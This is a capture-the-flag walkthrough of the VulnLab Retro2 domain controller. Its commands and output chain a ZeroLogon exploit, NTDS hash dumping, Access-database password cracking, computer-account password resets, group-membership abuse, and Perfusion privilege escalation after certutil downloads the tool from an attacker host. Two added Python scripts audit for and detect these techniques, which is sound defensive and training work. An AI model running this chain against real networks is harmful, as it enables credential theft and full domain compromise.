vulnlab-retro2
Retro2 is an easy old-school Windows Server 2008 R2 DC that involves cracking a password-protected MS Access database, a pre-created computer account, GenericWrite, AddMember and Perfusion.exe.
nmap scan
# Nmap 7.93 scan initiated Wed Aug 28 09:41:18 2024 as: nmap -Pn -sC -sV -oN retro2.nmap 10.10.122.16
Nmap scan report for 10.10.122.16
Host is up (0.019s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-08-28 07:41:28Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: retro2.vl, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds  Windows Server 2008 R2 Datacenter 7601 Service Pack 1 microsoft-ds (workgroup: RETRO2)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: BLN01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   210:
|_    Message signing enabled and required
|_clock-skew: mean: -40m00s, deviation: 1h09m16s, median: -1s
| smb-os-discovery:
|   OS: Windows Server 2008 R2 Datacenter 7601 Service Pack 1 (Windows Server 2008 R2 Datacenter 6.1)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: BLN01
|   NetBIOS computer name: BLN01\x00
|   Domain name: retro2.vl
|   Forest name: retro2.vl
|   FQDN: BLN01.retro2.vl
|_  System time: 2024-08-28T09:42:17+02:00
| smb2-time:
|   date: 2024-08-28T07:42:18
|_  start_date: 2024-08-28T07:40:52
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Aug 28 09:42:57 2024 -- 1 IP address (1 host up) scanned in 99.04 seconds
unintended zerologon
┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$ python3 cve-2020-1472-exploit.py bln01 10.10.122.16
Performing authentication attempts...
===============================================================================================
Target vulnerable, changing account password to empty string

Result: 0

Exploit complete!
secretsdump
┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$ impacket-secretsdump -just-dc -no-pass bln01\$@10.10.122.16
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c0<redacted>48:::
enumerate SMB shares
┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$ netexec smb 10.10.122.16
SMB         10.10.122.16    445    BLN01            [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)

┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$ netexec smb 10.10.122.16 -u 'puck' -p '' --shares
SMB         10.10.122.16    445    BLN01            [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)
SMB         10.10.122.16    445    BLN01            [+] retro2.vl\puck:
SMB         10.10.122.16    445    BLN01            [*] Enumerated shares
SMB         10.10.122.16    445    BLN01            Share           Permissions     Remark
SMB         10.10.122.16    445    BLN01            -----           -----------     ------
SMB         10.10.122.16    445    BLN01            ADMIN$                          Remote Admin
SMB         10.10.122.16    445    BLN01            C$                              Default share
SMB         10.10.122.16    445    BLN01            IPC$                            Remote IPC
SMB         10.10.122.16    445    BLN01            NETLOGON                        Logon server share
SMB         10.10.122.16    445    BLN01            Public          READ
SMB         10.10.122.16    445    BLN01            SYSVOL                          Logon server share

┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$ impacket-smbclient guest@retro2.vl -no-pass
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Type help for list of commands
# use Public
# ls
drw-rw-rw-          0  Sat Aug 17 16:30:37 2024 .
drw-rw-rw-          0  Sat Aug 17 16:30:37 2024 ..
drw-rw-rw-          0  Sat Aug 17 16:30:37 2024 DB
drw-rw-rw-          0  Sat Aug 17 13:58:07 2024 Temp
# cd DB
# ls
drw-rw-rw-          0  Sat Aug 17 16:30:37 2024 .
drw-rw-rw-          0  Sat Aug 17 16:30:37 2024 ..
-rw-rw-rw-     876544  Sat Aug 17 16:30:34 2024 staff.accdb
# get staff.accdb
If we open it with Microsoft Access, it prompts for a password. We use office2john to extract the hash and then crack it.
┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$ office2john staff.accdb | tee officehash
staff.accdb:$office$*2013*100000*256*16*5736<redacted>8235

┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$ john officehash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Office, 2007/2010/2013 [SHA1 256/256 AVX2 8x / SHA512 256/256 AVX2 4x AES])
Cost 1 (MS Office version) is 2013 for all loaded hashes
Cost 2 (iteration count) is 100000 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:03 0.00% (ETA: 06:07:07) 0g/s 223.4p/s 223.4c/s 223.4C/s bambam..james1
cl<redacted>08        (staff.accdb)
In the Access database we find:
strsUser = "retro2\ldapreader"
strsPassword = "pp<redacted>5R"
BloodHound analysis
bloodhound-python -d retro2.vl -c all -u ldapreader -p pp<redacted>5R -ns 10.10.122.16 --dns-tcp --zip
we find:
The computer account FS01 is a member of the Domain Computers group. The Domain Computers group has GenericWrite over ADMWS01. ADMWS01 has the AddSelf permission over the Services group. Members of the Services group can RDP to the DC BLN01.
We guess that the computer account's password is the same as its computer name (fs01), as is typical for a pre-created computer account. We cannot use this computer account as it is, because its password has never been changed, so we change it with rpcchangepwd.py.
wget https://raw.githubusercontent.com/api0cradle/impacket/a1d0cc99ff1bd4425eddc1b28add1f269ff230a6/examples/rpcchangepwd.py

┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$ python3 rpcchangepwd.py retro2.vl/fs01\$:fs01@10.10.122.16 -newpass P@ssw0rd
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Password was changed successfully.
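From the defender's side, the weakness used above is a computer object that was pre-created and never joined, so its initial password is still in place. The following audit script is an added example for this write-up (not a tool from the lab or from the author): it reads an LDIF-style export of computer objects (as produced by ldapsearch -LLL, for instance) and flags accounts that carry the PASSWD_NOTREQD bit, have never logged on, and whose pwdLastSet still matches whenCreated. The domain example.test and the three records are constructed sample data; the heuristic and the thresholds are this example's assumptions.

```python
"""Audit an LDAP export for pre-created computer accounts.

Added example for this write-up, not a tool from the lab or from the
author. It assumes an LDIF-style export of computer objects (for instance
from ldapsearch -LLL); the three records below are constructed sample data.
"""
from datetime import datetime, timedelta, timezone

# userAccountControl bits (documented AD flag values)
UF_PASSWD_NOTREQD = 0x0020             # set by the "pre-Windows 2000 computer" option
UF_WORKSTATION_TRUST_ACCOUNT = 0x1000  # object is a computer account

# pwdLastSet is a FILETIME: 100-ns ticks since 1601-01-01 UTC
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)

# Constructed sample export (hypothetical domain example.test):
# - FS01$ : PASSWD_NOTREQD, never logged on, password untouched since creation
# - WS07$ : normal joined workstation
# - WS08$ : joined and rotated its password, but still carries PASSWD_NOTREQD
SAMPLE_LDIF = """
dn: CN=FS01,CN=Computers,DC=example,DC=test
sAMAccountName: FS01$
userAccountControl: 4128
whenCreated: 20240817143001.0Z
pwdLastSet: 133683786010000000
logonCount: 0

dn: CN=WS07,CN=Computers,DC=example,DC=test
sAMAccountName: WS07$
userAccountControl: 4096
whenCreated: 20240817143001.0Z
pwdLastSet: 133709706010000000
logonCount: 42

dn: CN=WS08,CN=Computers,DC=example,DC=test
sAMAccountName: WS08$
userAccountControl: 4128
whenCreated: 20240817143001.0Z
pwdLastSet: 133709706010000000
logonCount: 3
"""


def parse_ldif(text):
    """Split an LDIF text into a list of {attribute: value} dicts (one per entry)."""
    records = []
    for block in text.strip().split("\n\n"):
        record = {}
        for line in block.splitlines():
            if not line or line.startswith("#"):
                continue
            key, _, value = line.partition(":")
            record[key.strip()] = value.strip()
        records.append(record)
    return records


def filetime_to_datetime(filetime):
    """Convert an AD FILETIME (int or decimal string) to an aware UTC datetime."""
    return FILETIME_EPOCH + timedelta(microseconds=int(filetime) // 10)


def generalized_time_to_datetime(value):
    """Convert an LDAP GeneralizedTime such as 20240817143001.0Z to a UTC datetime."""
    return datetime.strptime(value, "%Y%m%d%H%M%S.0Z").replace(tzinfo=timezone.utc)


def audit_computer_accounts(records, window=timedelta(minutes=5)):
    """Return (sAMAccountName, reason) for computer accounts that look pre-created
    and never joined, or that still carry PASSWD_NOTREQD after joining.
    `window` is the assumed tolerance between whenCreated and pwdLastSet."""
    findings = []
    for rec in records:
        uac = int(rec.get("userAccountControl", "0"))
        if not uac & UF_WORKSTATION_TRUST_ACCOUNT:
            continue  # only computer objects are of interest here
        name = rec.get("sAMAccountName", rec.get("dn", "?"))
        created = generalized_time_to_datetime(rec["whenCreated"])
        pwd_set = filetime_to_datetime(rec.get("pwdLastSet", "0"))
        never_logged_on = int(rec.get("logonCount", "0")) == 0
        password_untouched = abs(pwd_set - created) <= window
        if uac & UF_PASSWD_NOTREQD and never_logged_on and password_untouched:
            findings.append((name, "pre-created and never joined: initial password still in place"))
        elif uac & UF_PASSWD_NOTREQD:
            findings.append((name, "joined, but PASSWD_NOTREQD is still set"))
    return findings


if __name__ == "__main__":
    for name, reason in audit_computer_accounts(parse_ldif(SAMPLE_LDIF)):
        print(f"{name:10} {reason}")
```

Run against a real export, the first category is the one to act on: either complete the join, reset the account's password to a random value, or delete the stale object. The second category is lower priority but still worth cleaning up, since PASSWD_NOTREQD is only needed during the initial join.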
abuse the GenericWrite permission
┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$ netexec smb retro2.vl -u 'fs01$' -p 'P@ssw0rd'
SMB         10.10.122.16    445    BLN01            [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)
SMB         10.10.122.16    445    BLN01            [+] retro2.vl\fs01$:P@ssw0rd

┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$ net rpc password 'ADMWS01$' Passw0rd1 -U retro2.vl/'fs01$'%P@ssw0rd -S bln01.retro2.vl

┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$ netexec smb retro2.vl -u 'ADMWS01$' -p 'P@ssw0rd'
SMB         10.10.122.16    445    BLN01            [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)
SMB         10.10.122.16    445    BLN01            [-] retro2.vl\ADMWS01$:P@ssw0rd STATUS_LOGON_FAILURE
.
With bloodyAD we add 'ldapreader' to the Services group:
┌──(puck㉿kali)-[~/vulnlab/delegate/krbrelayx/bloodyAD]
└─$ python3 bloodyAD.py --host 10.10.122.16 -d retro2.vl -u 'ADMWS01$' -p 'Passw0rd1' add groupMember 'SERVICES' 'ldapreader'
[+] ldapreader added to SERVICES
Now we can RDP into the box:
┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$ xfreerdp /u:'ldapreader' /p:'pp<redacted>5R' /v:10.10.122.16 /d:retro2.vl /tls-seclevel:0
Privesc
Perfusion: any local user can create a Performance subkey and then leverage the Windows Performance Counters to load an arbitrary DLL in the context of the WMI service as NT AUTHORITY\SYSTEM (hence the tool's name).
c:\temp>certutil.exe -urlcache -f http://10.8.2.138:8000/Perfusion.exe Perfusion.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.

c:\temp>.\Perfusion.exe -c cmd -i
[*] Created Performance DLL: C:\Users\LDAPRE~1\AppData\Local\Temp\2\performance_2844_2224_2.dll
[*] Created Performance registry key.
[*] Triggered Performance data collection.
[+] Exploit completed. Got a SYSTEM token! :)
[*] Waiting for the Trigger Thread to terminate... OK
[!] Failed to delete Performance registry key.
[*] Deleted Performance DLL.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\temp>whoami
nt authority\system

c:\temp>type c:\users\administrator\desktop\root.txt
VL{fc<redacted>46}
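The two steps Perfusion logs above, creating a Performance subkey under a service and pointing it at a DLL in the user's Temp directory, are exactly what a registry-auditing sensor should light up on. The following detector is an added example for this write-up, not part of the original page or of the Perfusion project. It assumes registry events exported as JSON lines with Sysmon-style field names (EventID 12 for key create/delete, EventID 13 for value set, TargetObject, Details, User, Image); the host, the user LAB\alice, the service names and all four events are constructed.

```python
"""Flag suspicious Performance-subkey registry activity in Sysmon-style events.

Added example for this write-up, not part of the original page or of
Perfusion. Assumes registry events as JSON lines with Sysmon-style field
names (EventID 12 = key create/delete, 13 = value set, TargetObject,
Details, User, Image); the events below are constructed sample data.
"""
import json
import re

# ...\Services\<service>\Performance, optionally followed by a value name
PERF_KEY_RE = re.compile(
    r"\\Services\\(?P<service>[^\\]+)\\Performance(?:\\(?P<value>[^\\]+))?$",
    re.IGNORECASE,
)
# Counter DLLs registered by the OS normally live under System32
SYSTEM32_RE = re.compile(r"^[A-Za-z]:\\Windows\\System32\\", re.IGNORECASE)
SERVICE_ACCOUNTS = {
    "NT AUTHORITY\\SYSTEM",
    "NT AUTHORITY\\LOCAL SERVICE",
    "NT AUTHORITY\\NETWORK SERVICE",
}

# Constructed events: a benign OS registration (LegitSvc), then a user-created
# Performance key plus a Library value in the user's Temp directory (ExampleSvc),
# then an unrelated value write under the same service key.
SAMPLE_EVENTS = r"""
{"EventID": 13, "EventType": "SetValue", "User": "NT AUTHORITY\\SYSTEM", "Image": "C:\\Windows\\System32\\svchost.exe", "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\LegitSvc\\Performance\\Library", "Details": "C:\\Windows\\System32\\legitperf.dll"}
{"EventID": 12, "EventType": "CreateKey", "User": "LAB\\alice", "Image": "C:\\Users\\alice\\Downloads\\app.exe", "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\ExampleSvc\\Performance"}
{"EventID": 13, "EventType": "SetValue", "User": "LAB\\alice", "Image": "C:\\Users\\alice\\Downloads\\app.exe", "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\ExampleSvc\\Performance\\Library", "Details": "C:\\Users\\alice\\AppData\\Local\\Temp\\performance_1234.dll"}
{"EventID": 13, "EventType": "SetValue", "User": "NT AUTHORITY\\SYSTEM", "Image": "C:\\Windows\\System32\\services.exe", "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\ExampleSvc\\Start", "Details": "DWORD (0x00000002)"}
"""


def classify(event):
    """Return (severity, message) for a suspicious registry event, else None."""
    match = PERF_KEY_RE.search(event.get("TargetObject", ""))
    if not match:
        return None
    service, value = match.group("service"), match.group("value")
    user = event.get("User", "")
    event_id = int(event.get("EventID", 0))

    # A Performance subkey created under a service key by a non-service
    # account is the setup step this technique depends on.
    if (event_id == 12 and event.get("EventType") == "CreateKey"
            and user.upper() not in SERVICE_ACCOUNTS):
        return ("high", f"Performance subkey for {service} created by {user}")

    # The Library value names the DLL the counter loader will load; a path
    # outside System32 (profile, Temp) deserves an alert whoever wrote it.
    if event_id == 13 and value and value.lower() == "library":
        dll_path = event.get("Details", "")
        if not SYSTEM32_RE.match(dll_path):
            return ("high", f"Performance DLL for {service} points outside System32: {dll_path}")
    return None


def scan(jsonl_text):
    """Run classify() over JSON-lines input; returns [(severity, event_id, message)]."""
    alerts = []
    for line in jsonl_text.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        hit = classify(event)
        if hit:
            alerts.append((hit[0], int(event["EventID"]), hit[1]))
    return alerts


if __name__ == "__main__":
    for severity, event_id, message in scan(SAMPLE_EVENTS):
        print(f"[{severity}] EID {event_id}: {message}")
```

The benign LegitSvc registration and the Start value write produce nothing; the two ExampleSvc events each raise an alert. In practice the same two conditions map onto Windows object-access auditing (Event 4657) as well, and the lasting fix on this OS generation is tightening the ACL on service keys that let unprivileged users create subkeys.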
That was old-school fun.